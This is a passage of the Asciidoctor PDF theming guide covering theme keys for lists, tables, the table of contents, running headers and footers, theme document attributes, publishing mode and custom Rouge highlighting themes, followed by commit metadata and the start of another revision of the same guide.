|Example\n\n3+|*Key Prefix:* ulist_marker_<type>^[1]^\n\n|content\n|<<quoted-string,Quoted string>>\n|ulist\n marker:\n disc:\n content: \"\\uf140\"\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist\n marker:\n disc:\n font_family: fa\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist\n marker:\n disc:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|ulist\n marker:\n disc:\n font_color: #ff0000\n\n|line_height\n|<<values,Number>> +\n(default: _inherit_)\n|ulist\n marker:\n disc:\n line_height: 2\n|===\n\n. <type> is one of disc, square, circle, checked, unchecked\n\n[#keys-table]\n=== Table\n\nThe keys in this category control the arrangement and style of tables and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-table]*Key Prefix:* <<key-prefix-table,table>>\n\n|background_color\n|<<colors,Color>> +\n(default: transparent)\n|table:\n background_color: #ffffff\n\n|border_color\n|<<colors,Color>> +\n(default: #000000)\n|table:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n border_style: solid\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|table:\n border_width: 0.5\n\n|caption_side\n|top {vbar} bottom +\n(default: top)\n|table:\n caption_side: bottom\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|table:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|table:\n font_family: Helvetica\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|table:\n font_size: 9.5\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|table:\n font_style: italic\n\n|grid_color\n|<<colors,Color>> +\n(default: $table_border_color)\n|table:\n grid_color: #eeeeee\n\n|grid_style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n grid_style: dashed\n\n|grid_width\n|<<values,Number>> +\n(default: $table_border_width)\n|table:\n grid_width: 0.5\n\n3+|[#key-prefix-table-head]*Key Prefix:* <<key-prefix-table-head,table_head>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: _inherit_)\n\/\/|table:\n\/\/ head:\n\/\/ align: center\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n head:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_font_color)\n|table:\n head:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_font_family)\n|table:\n head:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $table_font_size)\n|table:\n head:\n font_size: 10\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|table:\n head:\n font_style: normal\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|table:\n head:\n text_transform: uppercase\n\n3+|[#key-prefix-table-body]*Key Prefix:* <<key-prefix-table-body,table_body>>\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n body:\n background_color: #fdfdfd\n\n|stripe_background_color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|table:\n body:\n stripe_background_color: #efefef\n\n3+|[#key-prefix-table-foot]*Key Prefix:* <<key-prefix-table-foot,table_foot>>\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n foot:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_font_color)\n|table:\n foot:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_font_family)\n|table:\n foot:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $table_font_size)\n|table:\n foot:\n font_size: 10\n\n|font_style\n|<<font-styles,Font style>> +\n(default: normal)\n|table:\n foot:\n font_style: italic\n\n\/\/deprecated\n\/\/3+|[#key-prefix-table-row]*Key Prefix:* <<key-prefix-table-row,table_<parity>_row>>^[1]^\n\/\/\n\/\/|background_color\n\/\/|<<colors,Color>> +\n\/\/(default: $table_background_color)\n\/\/|table:\n\/\/ even_row:\n\/\/ background_color: #f9f9f9\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-table-cell,table_cell>>\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 2)\n|table:\n cell:\n padding: 3\n\n3+|[#key-prefix-table-header-cell]*Key Prefix:* <<key-prefix-table-header-cell,table_header_cell>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: $table_head_align)\n\/\/|table:\n\/\/ header_cell:\n\/\/ align: center\n\n|background_color\n|<<colors,Color>> +\n(default: $table_head_background_color)\n|table:\n header_cell:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_head_font_color)\n|table:\n header_cell:\n font_color: #1a1a1a\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_head_font_family)\n|table:\n header_cell: \n font_family: Noto Sans\n\n|font_size\n|<<values,Number>> +\n(default: $table_head_font_size)\n|table:\n header_cell:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $table_head_font_style)\n|table:\n header_cell:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $table_head_text_transform)\n|table:\n header_cell:\n text_transform: uppercase\n|===\n. Applied to even rows by default; controlled using `stripes` attribute (even, odd, all, none) on table.\n\/\/. `<parity>` can be `odd` (odd rows) or `even` (even rows).\n\n[#keys-table-of-contents]\n=== Table of Contents (TOC)\n\nThe keys in this category control the arrangement and style of the table of contents.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-toc]*Key Prefix:* <<key-prefix-toc,toc>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n\/\/ QUESTION why is the default not inherited?\n(default: normal)\n|toc:\n font_style: bold\n\n|text_decoration\n|none {vbar} underline +\n(default: none)\n|toc:\n text_decoration: underline\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|toc:\n line_height: 1.5\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 15)\n|toc:\n indent: 20\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|toc:\n margin_top: 0\n\n3+|[#key-prefix-toc-level]*Key Prefix:* <<key-prefix-toc-level,toc_h<n> >>^[1]^\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n h3_font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|toc:\n font_style: italic\n\n|text_decoration\n|none {vbar} underline +\n(default: _inherit_)\n|toc:\n text_decoration: none\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text_transform: uppercase\n\n3+|[#key-prefix-toc-title]*Key Prefix:* <<key-prefix-toc-title,toc_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading_h2_align)\n|toc:\n title:\n align: right\n\n|font_color\n|<<colors,Color>> +\n(default: $heading_h2_font_color)\n|toc:\n title:\n font_color: #aa0000\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $heading_h2_font_family)\n|toc:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $heading_h2_font_size)\n|toc:\n title:\n font_size: 18\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $heading_h2_font_style)\n|toc:\n title:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $heading_h2_text_transform)\n|sidebar:\n title:\n text_transform: uppercase\n\n3+|[#key-prefix-toc-dot-leader]*Key Prefix:* <<key-prefix-toc-dot-leader,toc_dot_leader>>\n\n|content\n|<<quoted-string,Quoted string>> +\n(default: '. ')\n|toc:\n dot_leader:\n content: \". \"\n\n|font_color^[2]^\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n dot_leader:\n font_color: #999999\n\n|font_style^[2]^\n|<<font-styles,Font style>> +\n(default: normal)\n|toc:\n dot_leader:\n font_style: bold\n\n|levels^[3]^\n|all {vbar} none {vbar} Integers (space-separated) +\n(default: all)\n|toc:\n dot_leader:\n levels: 2 3\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. The dot leader inherits all font properties except `font_style` from the root `toc` category.\n. 0-based levels (e.g., part = 0, chapter = 1).\nDot leaders are only shown for the specified levels.\nIf value is not specified, dot leaders are shown for all levels.\n\n[#keys-running-content]\n=== Running Content (Header & Footer)\n\nThe keys in this category control the arrangement and style of running header and footer content.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-header]*Key Prefix:* <<key-prefix-header,header>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|header:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: $base_border_width)\n|header:\n border_width: 0.25\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|header:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|header:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|header:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|header:\n font_style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n height: 0.75in\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|header:\n line_height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|header:\n padding: [0, 3, 0, 3]\n\n|image_vertical_align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n image_vertical_align: 4\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|header:\n vertical_align: center\n\n|<side>_columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|header:\n recto:\n columns: <25% =50% >25%\n\n|<side>_<position>_content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|header:\n recto:\n left:\n content: '\\{page-number}'\n\n3+|[#key-prefix-footer]*Key Prefix:* <<key-prefix-footer,footer>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|footer:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: $base_border_width)\n|footer:\n border_width: 0.25\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|footer:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|footer:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|footer:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|footer:\n font_style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n height: 0.75in\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|footer:\n line_height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|footer:\n padding: [0, 3, 0, 3]\n\n|image_vertical_align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n image_vertical_align: 4\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|footer:\n vertical_align: top\n\n|<side>_columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|footer:\n verso:\n columns: <50% =0% <50%\n\n|<side>_<position>_content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|footer:\n verso:\n center:\n content: '\\{page-number}'\n|===\n. The background color spans the width of the page, as does the border when a background color is specified.\n. If the height is not set, the running content at this periphery is disabled.\n. If the side padding is negative, the content will bleed into the margin of the page.\n. `<side>` can be `recto` (right-hand, odd-numbered pages) or `verso` (left-hand, even-numbered pages).\nWhere the page sides fall in relation to the physical or printed page number is controlled using the `pdf-folio-placement` attribute (except when `media=prepress`, which implies `physical`).\n. `<position>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer, respectively, or it will not be shown.\n\nIf you define running header and footer content in your theme, you can still disable this content per document by setting the `noheader` and `nofooter` attributes in the AsciiDoc document header, respectively.\n\nIf content is not specified for the running footer, the page number (i.e., `\\{page-number}`) is shown on the left on verso pages and the right on recto pages.\nYou can disable this behavior by defining the attribute `nofooter` in the AsciiDoc document header or by defining the key `footer_<side>_content: none` in the theme.\n\nTIP: Although not listed in the table above, you can control the font properties used for running content for each column position on each page side (e.g., `footer_<side>_<position>_font_color`).\nFor example, you can set the font color used for the right-hand column on recto pages by setting `footer_recto_right_font_color: 6CC644`.\n\n==== Attribute References\n\nYou can use _any_ attribute defined in your AsciiDoc document (such as `doctitle`) in the content of the running header and footer.\nIn addition, the following attributes are also available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* part-title\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nYou can also built-in AsciiDoc text replacements like `+(C)+`, numeric character references like `+©+` and inline formatting (e.g., bold, italic, monospace).\n\nHere's an example that shows how attributes and replacements can be used in the running footer:\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n line_height: 1\n recto:\n center:\n content: '(C) ACME -- v{revnumber}, {docdate}'\n verso:\n center:\n content: $header_recto_center_content\nfooter:\n height: 0.75in\n line_height: 1\n recto:\n right:\n content: '{section-or-chapter-title} | *{page-number}*'\n verso:\n left:\n content: '*{page-number}* | {chapter-title}'\n----\n\nYou can split the content value across multiple lines using YAML's multiline string syntax.\nIn this case, the single quotes around the string are not necessary.\nTo force a hard line break in the output, add `{sp}+` to the end of the line in normal AsciiDoc fashion.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n line_height: 1.2\n recto:\n right:\n content: |\n Section Title - Page Number +\n {section-or-chapter-title} - {page-number}\n verso:\n left:\n content: |\n Page Number - Chapter Title +\n {page-number} - {chapter-title}\n----\n\nTIP: You can use most AsciiDoc inline formatting in the values of these keys.\nFor instance, to make the text bold, surround it in asterisks (as shown above).\nOne exception to this rule are inline images, which are described in the next section.\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running header (which also applies for the footer).\n\n[source,yaml,subs=attributes+]\n----\nheader:\n height: 0.75in\n image_vertical_align: 2 {conum-guard-yaml} <1>\n recto:\n center:\n content: image:footer-logo.png[width=80]\n verso:\n center:\n content: $header_recto_center_content\n----\n<1> You can use the `footer_vertical_align` attribute to slighly nudge the image up or down.\n\nCAUTION: By default, the image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the width attribute accordingly using the `pdfwidth` attribute.\nAlternatively, you can set the `fit` attribute to `scale-down` (e.g., `fit=scale-down`) to reduce the image size to fit in the available space or `contain` (e.g., `fit=contain`) to resize the image to the maximum size that will fit.\n\n== Applying Your Theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n\nAs usual, you can also use build tools like Maven and Gradle to build a themed PDF.\nThe only thing you need to add to an existing build is the attributes mentioned above.\n\n* https:\/\/github.com\/asciidoctor\/asciidoctor-maven-examples\/tree\/master\/asciidoctor-pdf-with-theme-example[Maven Example]\n* https:\/\/github.com\/asciidoctor\/asciidoctor-gradle-examples\/tree\/master\/asciidoc-to-pdf-with-theme-example[Gradle Example]\n\n== Theme-Related Document Attributes\n\nThere are various settings in the theme you control using document attributes.\nThese settings override equivalent keys defined in the theme file, where applicable.\n\n[cols=\"2,3,6l\"]\n|===\n|Attribute |Value Type |Example\n\n|autofit-option\n|flag (default: _not set_)\n|:autofit-option:\n\n|chapter-label\n|string (default: Chapter)\n|:chapter-label: Chapitre\n\n|<face>-cover-image^[1]^\n|path^[2]^ {vbar} image macro^[3]^ +\n(format can be image or PDF)\n|:front-cover-image: image:front-cover.pdf[]\n\n|media\n|screen {vbar} print {vbar} prepress\n|:media: prepress\n\n|page-background-image^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image: image:bg.jpg[]\n\n|pagenums^[5]^\n|flag (default: _set_)\n|:pagenums:\n\n|pdf-page-layout\n|portrait {vbar} landscape\n|:pdf-page-layout: landscape\n\n|pdf-page-margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n|:pdf-page-margin: [1in, 0.5in]\n\n|pdf-page-size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width, height]>>\n|:pdf-page-size: 6in x 9in\n\n|pdf-folio-placement\n|virtual {vbar} virtual-inverted {vbar} physical {vbar} physical-inverted\n|:pdf-folio-placement: physical\n\n|pdfmark^[6]^\n|flag (default: _not set_)\n|:pdfmark:\n\n|text-alignment^[7]^\n|<<text-alignments,Text alignment>>\n|:text-alignment: left\n\n|title-logo-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n\n|title-page^[8]^\n|flag (default: _not set_)\n|:title-page:\n\n|title-page-background-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-page-background-image: image:title-bg.jpg[]\n|===\n\n. `<face>` can be `front` or `back`.\n. The path is resolved relative to base_dir.\n. The target of the image macro is resolved relative to `imagesdir`.\nIf the image macro syntax is not used, the value is resolved relative to the base directory, which defaults to the document directory.\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Controls whether the `page-number` attribute is accessible to the running header and footer content specified in the theme file.\nUse the `noheader` and `nofooter` attributes to disable the running header and footer, respectively, from the document.\n. Enables generation of the http:\/\/milan.kupcevic.net\/ghostscript-ps-pdf\/#marks[pdfmark] file, which contains metadata that is fed to Ghostscript when optimizing the PDF file.\n. _(Experimental)_ The `text-alignment` document attribute is intended as a simple way to toggle text justification.\nThe value of this attribute overrides the `base_align` key set by the theme.\nFor more fine-grained control, you should customize using the theme.\n. Force a title page to be added even when the doctype is not book.\n\n== Publishing Mode\n\nAsciidoctor PDF provides the following features to assist with publishing:\n\n* Double-sided (mirror) page margins\n* Automatic facing pages\n\nThese features are activated when you set the `media` attribute to `prepress` in the header of your AsciiDoc document or from the CLI or API.\nThe following sections describe the behaviors that this setting activates.\n\n=== Double-Sided Page Margins\n\nThe page margins for the recto (right-hand, odd-numbered) and verso (left-hand, even-numbered) pages are automatically calculated by replacing the side page margins with the values of the `page_margin_inner` and `page_margin_outer` keys.\n\nFor example, let's assume you've defined the following settings in your theme:\n\n[source,yaml]\n----\npage:\n margin: [0.5in, 0.67in, 0.67in, 0.67in]\n margin_inner: 0.75in\n margin_outer: 0.59in\n----\n\nThe page margins for the recto and verso pages will be resolved as follows:\n\nrecto page margin:: [0.5in, *0.59in*, 0.67in, *0.75in*]\nverso page margin:: [0.5in, *0.75in*, 0.67in, *0.59in*]\n\nThe page margins alternate between recto and verso.\nThe first page in the document is a recto page.\n\n=== Automatic Facing Pages\n\nWhen converting the book doctype using the prepress media setting, a blank page will be inserted when necessary to ensure the following elements start on a recto page:\n\n* Title page\n* Table of contents\n* First page of body\n* Parts and chapters\n\nOther \"`facing`\" pages may be added in the future.\n\nIt's possible to disable the automatic facing feature for a given part or chapter.\nThis can be done by adding the nonfacing option to the section node.\nWhen the nonfacing option is present, the part or chapter title will be placed on the following page.\n\n[source,asciidoc]\n----\n[%nonfacing]\n= Minor Chapter\n\ncontent\n----\n\nFor documents that use the article doctype, Asciidoctor PDF incorrectly places the document title and table of contents on their own pages.\nThis can result in the page numbering and the page facing to be out of sync.\nAs a workaround, Asciidoctor PDF inserts a blank page, if necessary, to ensure the first page of body content is a recto-facing page.\n\nYou can check on the status of this defect by following https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/95[issue #95].\n\n== Source Highlighting Theme\n\nYou can define and apply your own source highlighting theme to source blocks when using Rouge as the source highlighter.\nThis section explains how.\n\nA custom theme for Rouge is defined using a Ruby class.\nStart by creating a Ruby source file to define your theme.\nName the file according to the name of your theme and put the file in a folder of your choice (e.g., [.path]_rouge_themes\/custom.rb_).\nThe name of the Ruby class doesn't matter, though it's customary to name it according to the name of the theme as well.\n\n.rouge_themes\/custom.rb\n[source,ruby]\n----\nrequire 'rouge' unless defined? ::Rouge.version\n\nmodule Rouge; module Themes\n class Custom < CSSTheme\n name 'custom'\n\n style Comment, fg: '#008800', italic: true\n style Error, fg: '#a61717', bg: '#e3d2d2'\n style Str, fg: '#0000ff'\n style Str::Char, fg: '#800080'\n style Num, fg: '#0000ff'\n style Keyword, fg: '#000080', bold: true\n style Operator::Word, bold: true\n style Name::Tag, fg: '#000080', bold: true\n style Name::Attribute, fg: '#ff0000'\n style Generic::Deleted, fg: '#000000', bg: '#ffdddd', inline_block: true, extend: true\n style Generic::Inserted, fg: '#000000', bg: '#ddffdd', inline_block: true, extend: true\n style Text, {}\n end\nend; end\n----\n\nEach style declaration accepts the following properties:\n\n* `fg` - sets the foreground (text) color\n* `bg` - sets the background color\n* `bold` - change the font weight to bold\n* `italic` - change the font style to italic\n* `underline` - add an underline to the text\n* `inline_block` - fill the background color to the height of the line (Asciidoctor PDF only)\n* `extend` - extend the background color to the end of the line for a line-oriented match (Asciidoctor PDF only)\n\nColors are defined using hexidecimal format (e.g., #ff0000 for red).\n\nUse the `Text` token to set the background color of the source block and the default text color.\n\nThe complete list of tokens can be found in the https:\/\/github.com\/jneen\/rouge\/blob\/master\/lib\/rouge\/token.rb[token.rb] file from Rouge.\nRefer to the https:\/\/github.com\/jneen\/rouge\/tree\/master\/lib\/rouge\/themes[bundled themes] to find more examples.\n\nOnce you've defined your theme, you need to enable it use it using the `rouge-style` document attribute, which you specify in the document header or via the Asciidoctor CLI or API.\n\n[source,asciidoc]\n----\n:source-highlighter: rouge\n:rouge-style: custom\n----\n\nFinally, you need to active your theme by requiring the theme file when you invoke Asciidoctor.\n\n $ asciidoctor -r .\/rouge_themes\/custom.rb sample.adoc\n\nYou should now see that the source code is highlighted to your liking.\nFor more information about source highlighting with Rouge, refer to the http:\/\/rouge.jneen.net\/[Rouge project page].\n\n\/\/\/\/\n== Resources for Extending Asciidoctor PDF\n\n* http:\/\/www.sitepoint.com\/hackable-pdf-typesetting-in-ruby-with-prawn[Hackable PDF typesetting in Ruby with Prawn]\n\/\/\/\/\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ea18fa349a8287e8af2496691163f424695c3b19","subject":"clarify background color and image settings in theming guide [skip ci]","message":"clarify background color and image settings in theming guide [skip ci]\n","repos":"mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf","old_file":"docs\/theming-guide.adoc","new_file":"docs\/theming-guide.adoc","new_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>\n\/\/ Settings:\n:idprefix:\n:idseparator: -\n:toc: preamble\n:experimental:\nifndef::env-github[:icons: font]\nifdef::env-github[]\n:outfilesuffix: .adoc\n:!toc-title:\n:caution-caption: :fire:\n:important-caption: :exclamation:\n:note-caption: :paperclip:\n:tip-caption: :bulb:\n:warning-caption: :warning:\nendif::[]\n:window: _blank\n\/\/ Aliases:\n:conum-guard-yaml: #\nifndef::icons[:conum-guard-yaml: # #]\nifdef::backend-pdf[:conum-guard-yaml: # #]\n:url-fontforge: https:\/\/fontforge.github.io\/en-US\/\n:url-fontforge-scripting: https:\/\/fontforge.github.io\/en-US\/documentation\/scripting\/\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\n[.lead]\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file Asciidoctor PDF generates from AsciiDoc.\nThis document describes how the theming system works, how to define a custom theme in YAML and how to activate the theme when running Asciidoctor PDF.\n\nTIP: The quickest way to get started creating your own theme is to <<Extends,extend the default theme>>.\nThis not only gives you all the styles you need to build on, but also a collection of <<Bundled Fonts,bundled fonts>>.\nIf you override the font catalog in your theme file, you must declare all the fonts you use (and provide the font files themselves).\nInsted, if you want to reuse the bundled fonts, simply reference the <<Bundled Fonts,bundled fonts>> in the <<Custom Fonts,font catalog>>.\n\nWARNING: If you don't declare your own fonts (or extend the default theme), only the built-in (AFM) fonts provided by the PDF reader will be available.\nUsing AFM fonts can result in missing functionality and warnings.\nSee the <<Built-In (AFM) Fonts>> section to learn more about these limitations.\n\ntoc::[]\n\n== Language Overview\n\nThe Asciidoctor PDF theme language is described using the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many _concepts_ from CSS and SASS.\nTherefore, if you have a background in web design, the terminology should be immediately familiar to you.\n*Note, however, that the theming system isn't actually CSS.*\n\nLike CSS, themes have both selectors and properties.\nSelectors are the component you want to style.\nThe properties are the style elements of that component that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font-size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\n* An underscore (`_`) may be used in place of a hyphen (`-`) in all property names (so you may use `font_family` or `font-family`).\n* An underscore (`_`) may be used in place of a hyphen (`-`) in all variable names (so you may use `$base_font_family` or `$base-font-family`).\n* Instead of separate properties for font weight and font style, the theme language combines these settings in the `font-style` property (allowed values: `normal`, `bold`, `italic` and `bold_italic`).\n* The `align` property in the theme language is roughly equivalent to the `text-align` property in CSS.\n* The `font-color` property in the theme language is equivalent to the `color` property in CSS.\n====\n\nA theme is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme 